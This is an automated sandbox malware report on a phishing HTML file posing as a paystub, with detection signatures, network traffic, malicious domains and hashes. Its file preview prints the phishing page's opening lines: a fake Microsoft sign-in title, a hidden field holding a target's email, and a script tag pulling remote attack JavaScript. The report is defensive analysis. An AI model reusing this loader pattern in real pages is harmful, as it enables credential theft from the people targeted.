Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
paystub_11_24_2022.html

Overview

General Information

Sample Name:paystub_11_24_2022.html
Analysis ID:756209
MD5:e1892a15eb3e631a1092656d70b4d153
SHA1:bb4fedcb1a78f24312d38b38614c67f3da01abe6
SHA256:3a038932b8fca36ec5b47950e9d903c746b2430e313ccbec2e94a0919353077b

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Yara detected HtmlPhish54
HTML document with suspicious title
Phishing site detected (based on image similarity)
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\eyup\Desktop\paystub_11_24_2022.html MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
    • chrome.exe (PID: 2852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1804,i,15675935499722441086,6223138009730746946,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
  • cleanup
SourceRuleDescriptionAuthorStrings
84922.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    84922.0.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: 84922.0.pages.csv, type: HTML
      Source: Yara matchFile source: 84922.0.pages.csv, type: HTML
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 84922.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 84922.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 80632.3.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 84922.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 80632.3.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 84922.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 80632.3.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 84922.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 80632.3.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 84922.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlMatcher: Found strong image similarity, brand: Microsoft image: 80632.3.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: Has password / email / username input fields
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: Has password / email / username input fields
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: HTML title missing
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: HTML title missing
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlHTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
      Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.2:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.199.23.72:443 -> 192.168.2.2:49745 version: TLS 1.2
      Source: unknownDNS traffic detected: queries for: accounts.google.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.100
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.100
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.100
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.100
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.100
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.100
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.100
      Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.2:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.199.23.72:443 -> 192.168.2.2:49745 version: TLS 1.2

      System Summary

      barindex
      Source: file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmlTab title: Sign in to your account
      Source: classification engineClassification label: mal64.phis.winHTML@23/0@11/91
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\eyup\Desktop\paystub_11_24_2022.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1804,i,15675935499722441086,6223138009730746946,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1804,i,15675935499722441086,6223138009730746946,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdater
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      2
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Non-Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      paystub_11_24_2022.html5%ReversingLabs
      paystub_11_24_2022.html2%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      cs1100.wpc.omegacdn.net0%VirustotalBrowse
      cs1227.wpc.alphacdn.net0%VirustotalBrowse
      part-0017.t-0009.fbs1-t-msedge.net0%VirustotalBrowse
      asturesharpointfile.com1%VirustotalBrowse
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      cs1100.wpc.omegacdn.net
      152.199.23.37
      truefalseunknown
      accounts.google.com
      142.250.186.173
      truefalse
        high
        part-0017.t-0009.fbs1-t-msedge.net
        13.107.227.45
        truefalseunknown
        cs1227.wpc.alphacdn.net
        192.229.221.185
        truefalseunknown
        www.google.com
        172.217.16.132
        truefalse
          high
          clients.l.google.com
          142.250.185.206
          truefalse
            high
            asturesharpointfile.com
            198.54.115.74
            truefalseunknown
            cs1025.wpc.upsiloncdn.net
            152.199.23.72
            truefalse
              unknown
              advancelevelsset.com
              68.65.122.77
              truefalse
                unknown
                aadcdn.msauthimages.net
                unknown
                unknownfalse
                  unknown
                  clients2.google.com
                  unknown
                  unknownfalse
                    high
                    code.jquery.com
                    unknown
                    unknownfalse
                      high
                      cdn.jsdelivr.net
                      unknown
                      unknownfalse
                        high
                        aadcdn.msftauth.net
                        unknown
                        unknownfalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          file:///C:/Users/eyup/Desktop/paystub_11_24_2022.htmltrue
                            low
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.186.35
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.185.206
                            clients.l.google.comUnited States
                            15169GOOGLEUSfalse
                            34.104.35.123
                            unknownUnited States
                            15169GOOGLEUSfalse
                            152.199.23.72
                            cs1025.wpc.upsiloncdn.netUnited States
                            15133EDGECASTUSfalse
                            13.107.227.45
                            part-0017.t-0009.fbs1-t-msedge.netUnited States
                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            142.250.186.173
                            accounts.google.comUnited States
                            15169GOOGLEUSfalse
                            198.54.115.74
                            asturesharpointfile.comUnited States
                            22612NAMECHEAP-NETUSfalse
                            104.16.85.20
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            192.229.221.185
                            cs1227.wpc.alphacdn.netUnited States
                            15133EDGECASTUSfalse
                            68.65.122.77
                            advancelevelsset.comUnited States
                            22612NAMECHEAP-NETUSfalse
                            69.16.175.10
                            unknownUnited States
                            20446HIGHWINDS3USfalse
                            142.250.186.100
                            unknownUnited States
                            15169GOOGLEUSfalse
                            152.199.23.37
                            cs1100.wpc.omegacdn.netUnited States
                            15133EDGECASTUSfalse
                            172.217.16.132
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            142.250.186.99
                            unknownUnited States
                            15169GOOGLEUSfalse
                            IP
                            127.0.0.1
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:756209
                            Start date and time:2022-11-29 20:18:56 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:paystub_11_24_2022.html
                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                            Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            Analysis Mode:stream
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal64.phis.winHTML@23/0@11/91
                            Cookbook Comments:
                            • Found application associated with file extension: .html
                            • Exclude process from analysis (whitelisted): SIHClient.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.186.35, 104.16.85.20, 104.16.88.20, 104.16.86.20, 104.16.87.20, 104.16.89.20, 69.16.175.10, 69.16.175.42, 34.104.35.123
                            • Excluded domains from analysis (whitelisted): logincdn.msauth.net, client.wns.windows.com, cdn.jsdelivr.net.cdn.cloudflare.net, cds.s5x3j6q5.hwcdn.net, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, lgincdnvzeuno.ec.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, lgincdnvzeuno.azureedge.net, edgedl.me.gvt1.com, login.live.com, lgincdn.trafficmanager.net, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, aadcdnoriginwus2.afd.azureedge.net, global-entry-afdthirdparty-fallback.trafficmanager.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                            • VT rate limit hit for: aadcdn.msauthimages.net
                            • VT rate limit hit for: aadcdn.msftauth.net
                            • VT rate limit hit for: advancelevelsset.com
                            • VT rate limit hit for: cs1025.wpc.upsiloncdn.net
                            No created / dropped files found
                            File type:HTML document, ASCII text, with CRLF line terminators
                            Entropy (8bit):4.860422043486462
                            TrID:
                            • HyperText Markup Language (12001/1) 51.06%
                            • HyperText Markup Language (11501/1) 48.94%
                            File name:paystub_11_24_2022.html
                            File size:286
                            MD5:e1892a15eb3e631a1092656d70b4d153
                            SHA1:bb4fedcb1a78f24312d38b38614c67f3da01abe6
                            SHA256:3a038932b8fca36ec5b47950e9d903c746b2430e313ccbec2e94a0919353077b
                            SHA512:e7eddfa9696b42639546c060944dd32fc4cc18b2642c17b049009ad5cf43c98eed160aeb228e8727ebf859b3e8cdf64729e59161c13d7f10b574808639e5848f
                            SSDEEP:6:dMq7cKWOHIKAEtWnRWc0MzdqejqXw4dfRIvjmoNHGLZNVMsXfGb:dMqlzhglLIeOXZCLTxSVMuGb
                            TLSH:31D02B77D9C4CC1001F04DB975E6F6EC718B604DD3D099967994781B2361E288A93975
                            File Content Preview:</script>..<html dir="ltr" class="" lang="en">..<head>.. <title>Sign in to your account</title>..</head>..<body>.. <input type="hidden" value="bnguyen@stackoverflow.com" id="email_get">.. <script src="https://cdn.jsdelivr.net/gh/younqpappi/qpp/qps.js"><
                            Icon Hash:78d0a8cccc88c460